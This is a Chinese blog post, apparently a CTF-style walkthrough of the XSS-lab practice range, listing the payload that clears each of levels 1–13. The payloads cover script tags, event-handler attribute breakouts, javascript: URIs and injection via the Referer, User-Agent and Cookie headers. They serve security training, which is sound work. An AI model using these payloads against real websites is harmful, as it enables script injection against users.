xsslab通关记录(一)

XSSLab是一个经典的XSS攻防练习平台,提供了多个等级的挑战。从level-1到level-13,每个级别涉及不同的XSS注入技巧,包括<script>标签、事件触发、URL编码等。用户可以通过GitHub源码或在线靶场进行实践,部分关卡需要对请求头、Referer、User-Agent或Cookie进行代码审计和修改payload来触发XSS攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

#简介 xsslab是最经典的xss练习靶场。 GitHub地址--https://github.com/rebo-rn/xss-lab 本人使用在线靶场--http://xss.xiejiahe.com/

#详解

  1. level-1 http://xss-ctf.xiejiahe.com/level1?name=%3Cscript%3Ealert(1)%3C/script%3E
  2. level-2 "onclick="alert(1)
  3. level-3 ' onclick=alert(/xss/)//
  4. level-4 " onclick = "alert(1)""
  5. level-5 "><iframe src=javascript:alert(/xss/)> "><a href=" javascript:alert(/xss/)" 注意这个小线条才是a标签 16817193811476.png
  6. level-6 "Onclick="alert(1)
  7. level-7 "Onclick="alert(1)
  8. level-8 javascript:alert(1)
  9. level-9 javascript:%0dhttp://%0dalert(/xss/) %0d是空字符串的URL编码
  10. leve-10 查看源码发现需要两个GET参数,一个是keyword,一个是t_sort。 keyword=test&t_sort="type="text" onclick="alert(/xss/)
  11. level-11 需要先代码审计一下,payload位置在请求头Referer参数 使用burp工具拦截修改请求头后再发送请求 " onmouseover=alert(/xss/) type="text" 2023-04-17214849.png
  12. level-12 和十一payload一样,只是位置是请求头User-Agent参数值
  13. level-13 payload的位置在cookie中,burp拦截添加cookie user=call+me+maybe%3F" type="text" onmouseover=alert(/xss/) type="text"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值